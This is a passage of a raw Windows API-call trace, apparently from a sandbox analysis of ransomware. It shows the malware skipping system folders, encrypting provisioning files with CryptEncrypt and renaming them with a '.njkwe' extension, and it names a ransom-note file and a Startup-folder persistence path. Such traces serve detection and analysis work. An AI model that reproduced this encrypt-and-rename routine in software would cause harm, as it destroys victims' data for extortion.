(in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.044] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.044] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.044] CloseHandle (hObject=0x43c) returned 1 [0077.044] GetProcessHeap () returned 0xbe0000 [0077.044] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.044] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\166__Connections_Cellular_Claro (Guatemala)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.044] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\166__Connections_Cellular_Claro (Guatemala)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\166__connections_cellular_claro (guatemala)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\166__Connections_Cellular_Claro (Guatemala)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\166__connections_cellular_claro (guatemala)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.045] GetProcessHeap () returned 0xbe0000 [0077.045] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.045] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906742d4, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x906742d4, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x906742d4, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="167__Connections_Cellular_Telefonica (Guatemala)_i0$(__MVID)@WAP.provxml", cAlternateFileName="167__C~1.PRO")) returned 1 [0077.045] lstrcmpiW (lpString1="167__Connections_Cellular_Telefonica (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.045] lstrcmpiW (lpString1="167__Connections_Cellular_Telefonica (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.045] lstrcmpiW (lpString1="167__Connections_Cellular_Telefonica (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.045] lstrcmpiW (lpString1="167__Connections_Cellular_Telefonica (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.045] lstrcmpiW (lpString1="167__Connections_Cellular_Telefonica (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.045] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\167__Connections_Cellular_Telefonica (Guatemala)_i0$(__MVID)@WAP.provxml") returned 166 [0077.045] StrStrIW (lpFirst="167__Connections_Cellular_Telefonica (Guatemala)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.045] lstrcmpW (lpString1="167__Connections_Cellular_Telefonica (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.045] lstrcmpW (lpString1="167__Connections_Cellular_Telefonica (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.045] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\167__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.045] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\167__Connections_Cellular_Telefonica (Guatemala)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\167__connections_cellular_telefonica (guatemala)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.045] GetTickCount () returned 0x115398b [0077.045] GetTickCount () returned 0x115398b [0077.045] GetTickCount () returned 0x115398b [0077.045] GetTickCount () returned 0x115398b [0077.045] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.046] GetProcessHeap () returned 0xbe0000 [0077.046] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.046] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d9, lpOverlapped=0x0) returned 1 [0077.048] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.048] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d9, lpOverlapped=0x0) returned 1 [0077.048] GetProcessHeap () returned 0xbe0000 [0077.048] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.048] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.048] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.048] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.048] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.048] CloseHandle (hObject=0x43c) returned 1 [0077.049] GetProcessHeap () returned 0xbe0000 [0077.049] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.049] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\167__Connections_Cellular_Telefonica (Guatemala)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0077.049] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\167__Connections_Cellular_Telefonica (Guatemala)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\167__connections_cellular_telefonica (guatemala)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\167__Connections_Cellular_Telefonica (Guatemala)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\167__connections_cellular_telefonica (guatemala)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.049] GetProcessHeap () returned 0xbe0000 [0077.049] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.049] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906742d4, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x906742d4, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x906742d4, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="168__Connections_Cellular_TIGO (Guatemala)_i0$(__MVID)@WAP.provxml", cAlternateFileName="168__C~1.PRO")) returned 1 [0077.049] lstrcmpiW (lpString1="168__Connections_Cellular_TIGO (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.049] lstrcmpiW (lpString1="168__Connections_Cellular_TIGO (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.049] lstrcmpiW (lpString1="168__Connections_Cellular_TIGO (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.049] lstrcmpiW (lpString1="168__Connections_Cellular_TIGO (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.049] lstrcmpiW (lpString1="168__Connections_Cellular_TIGO (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.049] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\168__Connections_Cellular_TIGO (Guatemala)_i0$(__MVID)@WAP.provxml") returned 160 [0077.049] StrStrIW (lpFirst="168__Connections_Cellular_TIGO (Guatemala)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.049] lstrcmpW (lpString1="168__Connections_Cellular_TIGO (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.049] lstrcmpW (lpString1="168__Connections_Cellular_TIGO (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.050] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\168__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.050] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\168__Connections_Cellular_TIGO (Guatemala)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\168__connections_cellular_tigo (guatemala)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.050] GetTickCount () returned 0x115399a [0077.050] GetTickCount () returned 0x115399a [0077.050] GetTickCount () returned 0x115399a [0077.050] GetTickCount () returned 0x115399a [0077.050] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.050] GetProcessHeap () returned 0xbe0000 [0077.050] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.050] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x28b, lpOverlapped=0x0) returned 1 [0077.052] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd75, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.052] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x28b, lpOverlapped=0x0) returned 1 [0077.052] GetProcessHeap () returned 0xbe0000 [0077.052] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.052] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.052] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.052] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.052] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.052] CloseHandle (hObject=0x43c) returned 1 [0077.052] GetProcessHeap () returned 0xbe0000 [0077.052] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.052] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\168__Connections_Cellular_TIGO (Guatemala)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0077.052] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\168__Connections_Cellular_TIGO (Guatemala)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\168__connections_cellular_tigo (guatemala)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\168__Connections_Cellular_TIGO (Guatemala)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\168__connections_cellular_tigo (guatemala)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.053] GetProcessHeap () returned 0xbe0000 [0077.053] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.053] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906742d4, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x906742d4, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x906742d4, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="169__Connections_Cellular_TIGO (Guatemala)_i1$(__MVID)@WAP.provxml", cAlternateFileName="169__C~1.PRO")) returned 1 [0077.053] lstrcmpiW (lpString1="169__Connections_Cellular_TIGO (Guatemala)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.053] lstrcmpiW (lpString1="169__Connections_Cellular_TIGO (Guatemala)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.053] lstrcmpiW (lpString1="169__Connections_Cellular_TIGO (Guatemala)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.053] lstrcmpiW (lpString1="169__Connections_Cellular_TIGO (Guatemala)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.053] lstrcmpiW (lpString1="169__Connections_Cellular_TIGO (Guatemala)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.053] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\169__Connections_Cellular_TIGO (Guatemala)_i1$(__MVID)@WAP.provxml") returned 160 [0077.053] StrStrIW (lpFirst="169__Connections_Cellular_TIGO (Guatemala)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.053] lstrcmpW (lpString1="169__Connections_Cellular_TIGO (Guatemala)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.053] lstrcmpW (lpString1="169__Connections_Cellular_TIGO (Guatemala)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.053] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\169__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.053] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\169__Connections_Cellular_TIGO (Guatemala)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\169__connections_cellular_tigo (guatemala)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.053] GetTickCount () returned 0x115399a [0077.053] GetTickCount () returned 0x115399a [0077.053] GetTickCount () returned 0x115399a [0077.054] GetTickCount () returned 0x115399a [0077.054] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.054] GetProcessHeap () returned 0xbe0000 [0077.054] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.054] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0077.055] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.055] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0077.055] GetProcessHeap () returned 0xbe0000 [0077.055] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.055] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.056] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.056] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.056] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.056] CloseHandle (hObject=0x43c) returned 1 [0077.056] GetProcessHeap () returned 0xbe0000 [0077.056] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.056] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\169__Connections_Cellular_TIGO (Guatemala)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0077.056] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\169__Connections_Cellular_TIGO (Guatemala)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\169__connections_cellular_tigo (guatemala)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\169__Connections_Cellular_TIGO (Guatemala)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\169__connections_cellular_tigo (guatemala)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.057] GetProcessHeap () returned 0xbe0000 [0077.057] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.057] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9013ce1d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9013ce1d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9013ce1d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="16__Connections_Cellular_Optus (Australia)_i7$(__MVID)@WAP.provxml", cAlternateFileName="16__CO~1.PRO")) returned 1 [0077.057] lstrcmpiW (lpString1="16__Connections_Cellular_Optus (Australia)_i7$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.057] lstrcmpiW (lpString1="16__Connections_Cellular_Optus (Australia)_i7$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.057] lstrcmpiW (lpString1="16__Connections_Cellular_Optus (Australia)_i7$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.057] lstrcmpiW (lpString1="16__Connections_Cellular_Optus (Australia)_i7$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.057] lstrcmpiW (lpString1="16__Connections_Cellular_Optus (Australia)_i7$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.057] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\16__Connections_Cellular_Optus (Australia)_i7$(__MVID)@WAP.provxml") returned 160 [0077.057] StrStrIW (lpFirst="16__Connections_Cellular_Optus (Australia)_i7$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.057] lstrcmpW (lpString1="16__Connections_Cellular_Optus (Australia)_i7$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.057] lstrcmpW (lpString1="16__Connections_Cellular_Optus (Australia)_i7$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.057] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\16__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.057] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\16__Connections_Cellular_Optus (Australia)_i7$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\16__connections_cellular_optus (australia)_i7$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.057] GetTickCount () returned 0x115399a [0077.057] GetTickCount () returned 0x115399a [0077.057] GetTickCount () returned 0x115399a [0077.057] GetTickCount () returned 0x115399a [0077.057] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 